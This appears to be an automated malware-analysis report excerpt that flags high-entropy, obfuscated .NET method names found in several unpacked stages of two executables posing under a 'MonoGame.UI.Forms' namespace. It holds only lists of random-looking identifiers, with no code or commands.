Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/DtmJmghRepJRjNS.csHigh entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/VfG.csHigh entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/CWfA.csHigh entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/JRecbvfNSTtx.csHigh entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: TPykFAdhwNOvb.exe.4.dr, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.csHigh entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.csHigh entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/yhsvcD.csHigh entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.csHigh entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.csHigh entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.cs - High entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.cs - High entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/VfG.cs - High entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.cs - High entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 4.0.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/CWfA.cs - High entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.cs - High entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/VfG.cs - High entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/dUGNSEqE.cs - High entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/yhsvcD.cs - High entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.cs - High entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.cs - High entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/UXJYzIYriAOH.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'uyDZqofGJxNuQnXVKOFRBFRVQVUJTwnAkSJ', 'GIvhGLTjoGHfIgFyKQWsBYmCJPDIHTpKcrLa', 'gzeHoiQbtyCmRYBJTcRJcHbjCOVagNNXm', 'bpmlxhwvRZIDqjvWIlaKvFWJVWeafdFTI', 'wOEokzOWrXhvGtNFDIDXUClAgtxozyiJnt', 'lvojSbJxFvrWNUvtKzPdIwjdidycXTltoZ', 'QmKCwKspWHHmgBzqDiFAjFHgDZnTVhvvfL', 'lLBJBjmXBmotOtRbLmdYyLJnDetTpRCFcHwi'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/DtmJmghRepJRjNS.cs - High entropy of concatenated method names: '.ctor', 'jmOiwttsbqsBRaghzInUdqJAjBvhZeXFXvel', 'lKQkCJneWysHnpdvOzkhIBJeIFjctbeuiXC', 'ySAxwbPomrVrryIRdAgEOCFKGYhwVYTYlm', 'wxpWQOvEXnKyuUBdbypWLoBKTxoIaZbjA', 'uuqhqPnIrAimvHUKvjCyQFkqwQzERAKFX', 'RcDoOKXXmRmDVZZVaHrDrtkFqfmhCrlKzTLx', 'aKfrYnYlZGqJnrBixkYNcaUzkwmrmeRSL', 'tuXDaLHhPnrzFzjZWlucsRqsZATNWKJafVz', 'PbjIQuPLngJFJULyHqzJuoIYWKgOZiVJzZiS'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.cs - High entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/Tester/cfSLS.cs - High entropy of concatenated method names: '.ctor', '.ctor', 'UqyixXZotxFwemAKnrfbbvpTJYlultHZab', 'TAtIRRdGNmSvPYXhQrGmgpHQjGWDGNRZJRXN', 'zXDseRDtApxZRkFwnqNXJTuAXWORtfYAuI', 'CZFWScJHuzmtpnAIDUnFqFFehmZoNvEOFX', 'xZfCfRtwnSaJkaLcQNdlIiySssQIHPJJhgrJ', 'xHzXOBheKniPhRCRvcffFQPwecsGXzQrueqP', 'TkOOKeZDrHldDdxZwHeZykKfDQinBtRfEsBt', 'DTcAYVBdeBwIBYehNuRfmxXkXcFNsyOWghi'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/JRecbvfNSTtx.cs - High entropy of concatenated method names: 'BqqcTlipHuGvbJvmKWXOLCjgvOdDlYgjRr', 'OepSWjFbaFHdyVxvKmFVDeOANCuxJpJbKxix', 'YhYznSTazUwClxAHqyAnarkkydGkJeZcwXst', 'WwKxxzmGPYyFKnkHejkEBgfsVdlkSTZvoUfN', 'wmlPtlARIyfDYviqoetAOYsalWSdQqcYFtC', 'DqIIdpKmQqsILXHxmRFbxgijWUneIPUNWQxN', 'jPTXeqUQnLjyYAHJHzsykQJZtSsUgRVpIFi', 'keFRNXqCuphsJqfLHXFQHLAJjFqsZCubKEb', 'APFQzYwPugLdjnkVfaZGwarKlfEnKqORps', 'oweGxzapGJRTdNbtWwhWEQYCiyrWKyYhr'
Source: 4.2.qaxCr0UKyI0yfkE.exe.750000.0.unpack, MonoGame.UI.Forms/CWfA.cs - High entropy of concatenated method names: 'mCtmKpVVqzoglaBaJAWBPoIVKIYUfANdADw', 'NXFUfFGpDlNQWuhPTqlIjfuIaRjPhzCRT', 'rtgaXNXRKurmBwzsltPSFucPvtLlvcXliqUQ', 'SiDkkEGrmJSgNPamndmVIRDJyWuvsAlVxKn', 'QPLixCsHvlKGnFZisNiuKgYhxibQozsGHv', 'vANkHcuRGBmxiTPsQsfFrsrEDfbAUeieBw', 'fnUGNNLJCKNWezaUcRWBcVSJbcufmtIwW', 'FHDcFDfRLPpiQCUuEShUDRhSHkRLYjKaBN', 'dWOCmniVlkzGamqYvpxBEKNoQIrIkrnllwea', 'uxrxnlmKRartbTaYLcNxEmcKcnYgKqcovHn'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/BAXyVpJquGzWGCp.cs - High entropy of concatenated method names: 'dewtyKSWfZDrUqzYgOBzBuhpTJhlaTPVTWN', 'mRZOcRfsOIrSasCPZsfXyDJmgEljIaGnywL', 'WGAXUWQttigXHSjULDSxzLaCEnKRUokZjZ', 'OnapuhBabseDxeobiuhBYORFkiOCvCHzRXe', '.ctor', 'DWcOonqjenmLWcfTXWrLQfXTGdUrVNJIG', 'xcLEaUYGtuWPSGKShQhXFQnUHLXJVzeUK', 'riNxwPZbrcilZebGjInQDwLCdDjAFKAtX', 'gJcbPtkfXJbwYSRyyefeogloOaArvexHVqlI', 'GiqbdFmlgHLcItTlXNHSbbavLXCVSEUhGc'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/VfG.cs - High entropy of concatenated method names: 'ilHNbxekpbZzUXAGaNbmXJXjbjJvaOdUTm', 'XRbcCfJitFSNScjYuZsVghvmWuETiQsfFi', 'epIDDuRbTcyRWkcIaTuVLHAsqEEnsRcpg', 'jKwgQEjCtWunEBZJyVzqzCdbvDpRtdwqCgs', 'oZxYEKFlSJJQuEfDxvDfjaluBZPhRXvuxVFz', 'HZHmZOtpVDbpoKfalkAVWfUOonGHxAuoG', 'cmuSIsFedHKWdijcZfGdUgxhXDRyBrJztcfI', 'leooCrCBwxfnCBDKlVRuyJJZUOroNnbHZIeK', '.ctor', 'uEQsgQfNDNEVvTfXXDDIqFOEjzWnrKqbjB'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/dUGNSEqE.cs - High entropy of concatenated method names: 'OXhzvPIABrXbcyVvicyRZSYurCktHiINxZV', 'ockpwrLEjmnEKHJbelrGCgpjQkEZJxXeWi', 'ktwZdqOPmNSXRcwPwJUHgEGSBESoKgXuGf', 'AbuZFGWzNwbzeijGdirGlFhhXPgQKarTu', 'fRmTJeeDeNXVoHBtQwQFVKfSvDstydQnaQw', 'jpOOHojEixDcDoBhdlGHcjForJVIHbvDUG', '.ctor', 'qFBQtbZUopyavnAzeQLojkCpInkSDcBEc', 'iKQUOKFLTyiZDsWFtJoLInzFLyxOLQhKidJ', 'RmhVNLaSAQInSFRbtNtGhSmxJLzJbouwq'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/yhsvcD.cs - High entropy of concatenated method names: 'vgiqbpdsZZSRjijojrDZvTzVcFFxbsIkNZ', 'AoFkEdiPzhsREvNOuQILtKXaTPcKDOsxTcco', 'atAJajxGtiOyGLfESKJgVArJBuwJgiqoulIJ', 'nDntvBRtAnUEXJdIObGnqZLthRQVuQNvsvr', 'kmOEoHTZxFLbYVamajnFfgXYJkeGlRKIrr', 'GwjLrYntBNBmQwZqhubOYrReSHFHQHCax', 'hXUjHwZlgAaxvAvfidKORirFyBKSJBLTz', 'vFIcxNDXiWaNNyvSXowNYTiKLaKooWhJTqq', 'dyDcYKFyKxqXHJYDJYHEaiRDYslzNymVrcG', 'ZLoQNttqDoYmqNfokBgWtWNHxnzuDXeJzeA'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/wyCYmZnQYaRwVkKC.cs - High entropy of concatenated method names: '.ctor', 'JFoDjtSuqKLyZZsHdOpbQZysPvNVeGGYSgB', 'WGcNWBAiLSRoiPkrtZzsVICeLyFrsefzY', 'JOUmGDdmyfJfAAAAlewLKzuvpIXHnaEdqkdx', 'dZcpcvCTfQkmkWwELGibEahiJcqXATdzbjnb', 'OhxnCpqlspGKeRgkNcwZOfBwqrECwkSqewU', 'kmbNxYmxjzbLYrjZbFGqVbCekhpvdGlWU'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/SsrXqWqckQCrvj.cs - High entropy of concatenated method names: 'iOlHdQhTAckufgLtRppNFsyRTRTRAuOpl', 'ntQBshxAxOozJPaiITngKwXEGaIXSLTSiDG', 'rQpXQvpBpwUnNWtcdrXwGWdYmTIlYTvFQhGt', 'WddkqzCksggJbQVPBlIWfRcXFHkTRLBPSqL', 'hHZyUSGiUfHBHjEpekDljRybUVLxldVlp', 'sYVCdVKrHenpXpmNJldowLAAcbOLzGxhv', '.ctor', 'QZApokZdmFgBOqIoDuRGzRWKfSlpriSZmBf'
Source: 7.2.qaxCr0UKyI0yfkE.exe.cf0000.1.unpack, MonoGame.UI.Forms/Effects/vhvCnScudaJK.cs - High entropy of concatenated method names: 'hUDZPtPegJkNKjAQtSXnsYNQnSgZbVFfCWKl', 'uiHaITXlczBZqOAyGrjPIdcBGHTketejnkx', 'UAUytDxZFsInLaoALSKxKNEhjjUcIfFatdO', 'BqijaxCHyxTpyjUQarhBUikFFyNdmbbzY', '.ctor', 'IqXpbZSuWtqDEuFfeHOlEtxPhUVaERuCFG', 'chebPveURZsDZjYlmzwzKETsLHCQEBBtBD'
